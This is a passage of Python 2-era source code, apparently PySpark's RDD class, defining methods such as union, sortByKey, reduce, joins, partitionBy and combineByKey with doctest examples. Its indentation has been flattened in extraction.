sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
return rdd
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
return RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda x: (len(x[1][0]) != 0) and (len(x[1][1]) != 0)) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer == serializer:
return self
else:
converted = self.map(lambda x: x, preservesPartitioning=True)
converted._jrdd_deserializer = serializer
return converted
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
bounds = list()
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
if numPartitions > 1:
rddSize = self.count()
# constant from Spark's RangePartitioner
maxSampleSize = numPartitions * 20.0
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(
lambda (k, v): k).collect()
samples = sorted(samples, reverse=(not ascending), key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
for i in range(0, numPartitions - 1):
index = (len(samples) - 1) * (i + 1) / numPartitions
bounds.append(samples[index])
def rangePartitionFunc(k):
p = 0
while p < len(bounds) and keyfunc(k) > bounds[p]:
p += 1
if ascending:
return p
else:
return numPartitions - 1 - p
def mapFunc(iterator):
yield sorted(iterator, reverse=(not ascending), key=lambda (k, v): keyfunc(k))
return (self.partitionBy(numPartitions, partitionFunc=rangePartitionFunc)
.mapPartitions(mapFunc, preservesPartitioning=True)
.flatMap(lambda x: x, preservesPartitioning=True))
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions)
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
['1', '2', '', '3']
"""
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
out.write(str(obj).rstrip('\n') + '\n')
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip('\n') for x in iter(pipe.stdout.readline, ''))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
yield None
self.mapPartitions(processPartition).collect() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print x
... yield None
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
self.mapPartitions(f).collect() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with _JavaStackTrace(self.context) as st:
bytesInJava = self._jrdd.collect().iterator()
return list(self._collect_iterator_through_file(bytesInJava))
def _collect_iterator_through_file(self, iterator):
# Transferring lots of data through Py4J can be slow because
# socket.readline() is inefficient. Instead, we'll dump the data to a
# file and read it back.
tempFile = NamedTemporaryFile(delete=False, dir=self.ctx._temp_dir)
tempFile.close()
self.ctx._writeToFile(iterator, tempFile.name)
# Read the data into Python and deserialize it:
with open(tempFile.name, 'rb') as tempFile:
for item in self._jrdd_deserializer.load_stream(tempFile):
yield item
os.unlink(tempFile.name)
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
"""
def func(iterator):
acc = None
for obj in iterator:
if acc is None:
acc = obj
else:
acc = f(obj, acc)
if acc is not None:
yield acc
vals = self.mapPartitions(func).collect()
return reduce(f, vals)
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
return self.mapPartitions(func).fold(zeroValue, combOp)
def max(self):
"""
Find the maximum item in this RDD.
>>> sc.parallelize([1.0, 5.0, 43.0, 10.0]).max()
43.0
"""
return self.reduce(max)
def min(self):
"""
Find the minimum item in this RDD.
>>> sc.parallelize([1.0, 5.0, 43.0, 10.0]).min()
1.0
"""
return self.reduce(min)
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for (k, v) in m2.iteritems():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
"""
def topIterator(iterator):
q = []
for k in iterator:
if len(q) < num:
heapq.heappush(q, k)
else:
heapq.heappushpop(q, k)
yield q
def merge(a, b):
return next(topIterator(a + b))
return sorted(self.mapPartitions(topIterator).reduce(merge), reverse=True)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def topNKeyedElems(iterator, key_=None):
q = MaxHeapQ(num)
for k in iterator:
if key_ is not None:
k = (key_(k), k)
q.insert(k)
yield q.getElements()
def unKey(x, key_=None):
if key_ is not None:
x = [i[1] for i in x]
return x
def merge(a, b):
return next(topNKeyedElems(a + b))
result = self.mapPartitions(
lambda i: topNKeyedElems(i, key)).reduce(merge)
return sorted(unKey(result, key), key=key)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self._jrdd.partitions().size()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the first iteration, just
# try all partitions next. Otherwise, interpolate the number
# of partitions we need to try, but overestimate it by 50%.
if len(items) == 0:
numPartsToTry = totalParts - 1
else:
numPartsToTry = int(1.5 * num * partsScanned / len(items))
left = num - len(items)
def takeUpToNumLeft(iterator):
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(
partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p, True)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
"""
return self.take(1)[0]
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).collect())
[1, 2, 'rdd', 'spark']
"""
self._reserialize(BatchedSerializer(PickleSerializer(),
batchSize))._jrdd.saveAsObjectFile(path)
def saveAsTextFile(self, path):
"""
Save this RDD as a text file, using string representations of elements.
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, basestring):
x = unicode(x)
yield x.encode("utf-8")
keyed = PipelinedRDD(self, func)
keyed._bypass_serializer = True
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda (k, v): k)
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda (k, v): v)
def reduceByKey(self, func, numPartitions=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for (k, v) in iterator:
m[k] = v if k not in m else func(m[k], v)
yield m
def mergeMaps(m1, m2):
for (k, v) in m2.iteritems():
m1[k] = v if k not in m1 else func(m1[k], v)
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in other have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> set(sets[0]).intersection(set(sets[1]))
set([])
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
# Transferring O(n) objects to Java is too expensive. Instead, we'll
# form the hash buckets in Python, transferring O(numPartitions) objects
# to Java. Each object is a (splitNumber, [objects]) pair.
outputSerializer = self.ctx._unbatched_serializer
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
for (k, v) in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
for (split, items) in buckets.iteritems():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = PipelinedRDD(self, add_shuffle_key)
keyed._bypass_serializer = True
with _JavaStackTrace(self.context) as st:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
partitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = pairRDD.partitionBy(partitioner).values()
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
# This is required so that id(partitionFunc) remains unique, even if
# partitionFunc is a lambda:
rdd._partitionFunc = partitionFunc
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
def combineLocally(iterator):
combiners = {}
for x in iterator:
(k, v) = x
if k not in combiners:
combiners[k] = createCombiner(v)
else:
combiners[k] = mergeValue(combiners[k], v)
return combiners.iteritems()
locally_combined = self.mapPartitions(combineLocally)
shuffled = locally_combined.partitionBy(numPartitions)
def _mergeCombiners(iterator):
combiners = {}
for (k, v) in iterator:
if k not in combiners:
combiners[k] = v
else:
combiners[k] = mergeCombiners(combiners[k], v)
return combiners.iteritems()
return shuffled.mapPartitions(_mergeCombiners)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions)
def foldByKey(self, zeroValue, func, numPartitions=None):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> rdd.foldByKey(0, add).collect()
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions)
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with into numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey will provide much
better performance.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> map((lambda (x,y): (x, list(y))), sorted(x.groupByKey().collect()))
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
return a + b
return self.combineByKey(createCombiner, mergeValue, mergeCombiners,
numPartitions).mapValues(lambda x: ResultIterable(x))
# TODO: add tests
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda (k, v): ((k, x) for x in f(v))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda (k, v): (k, f(v))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1]), list(y[2]), list(y[3])))), \
sorted(list(w.groupWith(x, y, z).collect())))
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1])))), sorted(list(x.cogroup(y).collect())))
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func((key, vals)):
return len(vals[0]) > 0 and len(vals[1]) == 0
map_func = lambda (key, vals): [(key, val) for val in vals[0]]
return self.cogroup(other, numPartitions).filter(filter_func).flatMap(map_func)
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd).map(lambda tpl: tpl[0])
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> map((lambda (x,y): (x, (list(y[0]), (list(y[1]))))), sorted(x.cogroup(y).collect()))
[(0, ([0], [0])), (1, ([1], [1])), (2, ([], [2])), (3, ([], [3])), (4, ([2], [4]))]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def name(self):
"""
Return the name of this RDD.
"""
name_ = self._jrdd.name()
if not name_:
return None
return name_.encode('utf-8')
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.setName('RDD1')
>>> rdd1.name()
'RDD1'
"""
self._jrdd.setName(name)
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if not debug_string:
return None
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
